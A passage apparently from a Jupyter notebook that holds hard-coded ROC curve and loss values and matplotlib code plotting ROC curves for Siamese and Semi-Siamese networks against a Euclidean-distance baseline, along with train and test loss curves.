0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 
0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6451612903225806, 0.6451612903225806, 0.6451612903225806, 0.6451612903225806, 0.6612903225806451, 0.6612903225806451, 0.6612903225806451, 0.6774193548387096, 0.6935483870967742, 0.6935483870967742, 0.6935483870967742, 0.6935483870967742, 0.6935483870967742, 0.7096774193548387, 0.7096774193548387, 0.7096774193548387, 0.7096774193548387, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7419354838709677, 0.7580645161290323, 0.7580645161290323, 0.7580645161290323, 0.7741935483870968, 0.7741935483870968, 0.7903225806451613, 0.7903225806451613, 0.7903225806451613, 0.7903225806451613, 0.7903225806451613, 0.7903225806451613, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 
0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8225806451612904, 0.8225806451612904, 0.8225806451612904, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 
0.8709677419354839, 0.8870967741935484, 0.8870967741935484, 0.8870967741935484, 0.8870967741935484, 0.8870967741935484, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9193548387096774, 0.9193548387096774, 0.9193548387096774, 0.9193548387096774, 0.9193548387096774, 0.9354838709677419, 0.9354838709677419, 0.9354838709677419, 0.9354838709677419, 0.9354838709677419, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 
0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065] , [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.10344827586206896, 0.10344827586206896, 
0.10344827586206896, 0.10344827586206896, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1896551724137931, 0.20689655172413793, 0.20689655172413793, 0.20689655172413793, 0.22413793103448276, 0.25862068965517243, 0.25862068965517243, 0.25862068965517243, 0.25862068965517243, 0.27586206896551724, 0.29310344827586204, 0.29310344827586204, 0.3103448275862069, 0.3103448275862069, 0.3275862068965517, 0.3275862068965517, 0.3275862068965517, 0.3275862068965517, 0.3448275862068966, 0.3448275862068966, 0.3620689655172414, 0.3620689655172414, 0.3620689655172414, 0.3793103448275862, 0.3793103448275862, 0.3793103448275862, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.41379310344827586, 0.41379310344827586, 0.41379310344827586, 0.41379310344827586, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.4482758620689655, 0.4482758620689655, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.4827586206896552, 0.5172413793103449, 0.5172413793103449, 0.5172413793103449, 0.5172413793103449, 0.5172413793103449, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 
0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5689655172413793, 0.5689655172413793, 0.5689655172413793, 0.5689655172413793, 0.5689655172413793, 0.5689655172413793, 0.5862068965517241, 0.5862068965517241, 0.5862068965517241, 0.5862068965517241, 0.5862068965517241, 0.5862068965517241, 0.603448275862069, 0.603448275862069, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6379310344827587, 0.6379310344827587, 0.6379310344827587, 0.6379310344827587, 0.6379310344827587, 0.6551724137931034, 0.6551724137931034, 0.6551724137931034, 0.6551724137931034, 0.6724137931034483, 0.6724137931034483, 0.6896551724137931, 0.6896551724137931, 0.6896551724137931, 0.6896551724137931, 0.6896551724137931, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7241379310344828, 0.7241379310344828, 0.7413793103448276, 0.7413793103448276, 0.7413793103448276, 0.7413793103448276, 0.7413793103448276, 0.7586206896551724, 0.7586206896551724, 0.7586206896551724, 0.7586206896551724, 0.7586206896551724, 0.7586206896551724, 0.7758620689655172, 0.7758620689655172, 0.7758620689655172, 0.7758620689655172, 
0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.8103448275862069, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 
0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 
0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 
0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 
0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 
0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0] %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [10,10] plt.rcParams["figure.figsize"] = fig_size plt.axis('equal') plt.plot(x1, y1, 'b-.', label="Euclidean Distance") plt.plot(x2, y2, 'y--', label="Siamese ResNet") plt.plot(x4, y4, 'g:', label="Siamese SqueezeNet") plt.plot(x3, y3, 'r-', label="Semi-Siamese Network") plt.legend(loc='lower right', prop={'size': 20}) plt.xlabel('FPR', fontdict={'fontsize':20}) plt.ylabel('TPR', fontdict={'fontsize':20}) plt.axis('equal') # plt.title('Result on '+phase+' Data') axes = plt.gca() axes.set_xlim([-0.01, 1.01]) axes.set_ylim([-0.01, 1.01]) plt.show() loss_train = [4.4655, 4.2521, 4.1725, 4.1246, 4.0728, 3.8587, 3.9498, 3.9919, 3.8827, 3.8968, 3.9915, 3.8605, 3.8418, 3.7651, 3.9590, 3.8681, 3.9711, 3.6758, 3.8847, 3.8248, 3.8759, 3.7360, 3.8323, 3.7280, 3.7588, 3.7985, 3.6798, 3.8482, 3.9560, 3.8690, 3.8542, 3.7909, 3.8081, 3.6867, 3.8059, 3.8307, 3.7410, 3.8696, 3.7513, 3.8688, 3.6938, 3.7417, 3.8292, 3.8368, 3.7547, 3.6842, 3.9347, 3.8454, 3.8748, 3.7735, 3.5992, 3.7979, 3.8979, 3.7557, 3.8158, 3.7596, 3.8078, 3.9020, 3.8653, 4.0029, 3.6647, 3.8253, 3.7371, 3.7674, 3.9188, 3.9050, 4.0148, 3.8174, 3.7205, 4.0928, 3.7858, 3.8835, 3.9060, 3.8093, 3.7889, 3.7284, 3.8775, 3.8357, 3.8253, 3.6354, 3.6397, 3.8565, 3.8687, 3.8874, 3.9948, 3.8176, 3.7557, 3.6577, 3.7143, 3.8242, 3.9107, 3.8974, 3.7826, 3.7446, 3.8735, 3.8790, 3.8599, 3.7681, 3.8609, 3.9374,] loss_val = [4.2644, 4.6022, 6.1745, 4.1170, 4.5958, 3.9062, 3.9156, 4.2027, 4.1506, 5.0428, 4.4080, 4.1711, 4.6245, 4.3260, 4.0514, 4.1181, 4.4435, 4.0262, 4.2743, 4.1910, 4.2874, 4.4387, 3.9186, 4.3923, 4.3637, 4.8640, 4.0048, 4.1939, 4.8270, 
4.4657, 4.4441, 4.2456, 3.9262, 4.2140, 4.4151, 4.0230, 4.1857, 4.1594, 4.6407, 4.5859, 4.4277, 4.1604, 4.3410, 4.6541, 4.1013, 4.1526, 4.4693, 3.8926, 4.3638, 4.3524, 4.2512, 3.9800, 4.1352, 4.5946, 4.1261, 4.5393, 4.3123, 4.1407, 3.7365, 4.2107, 3.9650, 4.2301, 4.4351, 4.5525, 4.1203, 4.3653, 4.3156, 4.3476, 3.8617, 3.9145, 4.6624, 4.2847, 4.4377, 4.3604, 4.2985, 4.6417, 4.4340, 4.3786, 3.6240, 4.0985, 4.0712, 4.0163, 4.0735, 4.3497, 4.1751, 4.3959, 4.5499, 4.3857, 3.8553, 4.3035, 4.6984, 4.1772, 4.2948, 4.3471, 4.1601, 4.4616, 3.8350, 4.0570, 4.4019, 4.1189,] # from slurm-832012.out %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [6,6] plt.rcParams["figure.figsize"] = fig_size plt.plot(range(1, len(loss_train)+1), loss_train, 'b-', label="Train Loss") plt.plot(range(1, len(loss_val)+1), loss_val, 'r:', label="Test Loss") plt.legend(loc='upper right') plt.xlabel('Epoch') plt.ylabel('Loss') # plt.axis('equal') plt.title('Siamese Network') # axes = plt.gca() # axes.set_xlim([-0.01, 1.01]) # axes.set_ylim([-0.01, 1.01]) plt.show() loss_train = [0.6982, 0.6461, 0.5877, 0.5605, 0.5446, 0.5005, 0.4790, 0.4651, 0.4381, 0.4321, 0.4031, 0.4190, 0.4147, 0.3932, 0.3809, 0.3972, 0.3821, 0.3738, 0.3898, 0.3679, 0.3750, 0.3635, 0.3951, 0.3590, 0.3834, 0.3758, 0.3786, 0.3877, 0.3736, 0.3793, 0.3798, 0.3858, 0.3907, 0.3773, 0.3825, 0.3782, 0.3606, 0.3737, 0.3731, 0.3749, 0.3921, 0.3825, 0.3770, 0.3676, 0.3543, 0.3646, 0.3825, 0.3657, 0.3722, 0.3836, 0.3756, 0.3713, 0.3794, 0.3759, 0.3761, 0.3548, 0.3718, 0.3895, 0.3774, 0.3708, 0.3570, 0.3828, 0.3646, 0.3775, 0.3678, 0.3700, 0.3578, 0.3650, 0.3632, 0.3643, 0.3952, 0.3679, 0.3782, 0.3793, 0.3819, 0.3788, 0.3839, 0.3762, 0.3602, 0.3768, 0.3655, 0.3888, 0.3725, 0.3600, 0.3761, 0.3735, 0.3601, 0.3891, 0.3680, 0.3732, 0.3720, 0.3826, 0.3788, 0.3883, 0.3722, 0.3669, 0.3741, 0.3816, 0.3611, 0.3875,] loss_val = [0.6709, 0.6218, 0.5453, 0.5184, 0.4754, 0.4872, 0.4495, 0.4419, 